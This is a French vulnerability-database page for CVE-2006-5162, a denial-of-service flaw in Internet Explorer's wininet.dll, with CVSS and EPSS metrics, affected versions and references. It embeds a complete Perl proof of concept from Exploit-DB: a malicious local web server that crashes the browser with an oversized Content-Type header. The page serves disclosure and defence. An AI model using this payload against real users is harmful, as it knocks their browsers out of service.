CVE-2006-5162 : Détail

CVE-2006-5162

23.28%V3
Network
2006-10-03
21h00 +00:00
2017-10-18
14h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

wininet.dll in Microsoft Internet Explorer 6.0 SP2 and earlier allows remote attackers to cause a denial of service (unhandled exception and crash) via a long Content-Type header, which triggers a stack overflow.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 2039

Date de publication : 2006-07-19 22h00 +00:00
Auteur : Firestorm
EDB Vérifié : Yes

#!/usr/bin/perl # Stack overflow in wininet.dll while parsing huge( > ~1M) Content-Type response # ex.: Unhandled exception at 0x771c00ee in IEXPLORE.EXE: 0xC00000FD: Stack overflow. # # discovered by Firestorm # # Usage: # 1) run this code # 2) open http://127.0.0.1/ with IE # use IO::Socket; my $sock=new IO::Socket::INET (Listen => 1, LocalAddr => 'localhost', LocalPort => 80, Proto => 'tcp'); die unless $sock; $huge="A" x 1100000; $|=1; print ">http server started on port 80... try 'iexplore http://127.0.0.1/' \n"; $z=$sock->accept(); print ">connection!\n"; do { $ln=<$z>; print $ln; chomp $ln; if (($ln eq "")||($ln eq "\n")||($ln eq "\r")) { print ">sending response\n"; print $z "HTTP/1.1 200 OK\r\nServer: X3 1.0\r\nContent-Type: $huge\r\nConnection: close\r\n\r\ndone"; close($z); exit; } } while (true); # milw0rm.com [2006-07-20]

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 5.0

Microsoft>>Internet_explorer >> Version 5.0.1

Microsoft>>Internet_explorer >> Version 5.0.1

Microsoft>>Internet_explorer >> Version 5.0.1

Microsoft>>Internet_explorer >> Version 5.0.1

Microsoft>>Internet_explorer >> Version 5.0.1

Microsoft>>Internet_explorer >> Version 5.5

Microsoft>>Internet_explorer >> Version 5.5

Microsoft>>Internet_explorer >> Version 5.5

Microsoft>>Internet_explorer >> Version 6.0

Microsoft>>Internet_explorer >> Version 6.0

Microsoft>>Internet_explorer >> Version 6.0

    Références

    http://www.osvdb.org/29129
    Tags : vdb-entry, x_refsource_OSVDB
    https://www.exploit-db.com/exploits/2039
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.vupen.com/english/advisories/2006/2917
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.securityfocus.com/bid/19092
    Tags : vdb-entry, x_refsource_BID
    http://securityreason.com/securityalert/1683
    Tags : third-party-advisory, x_refsource_SREASON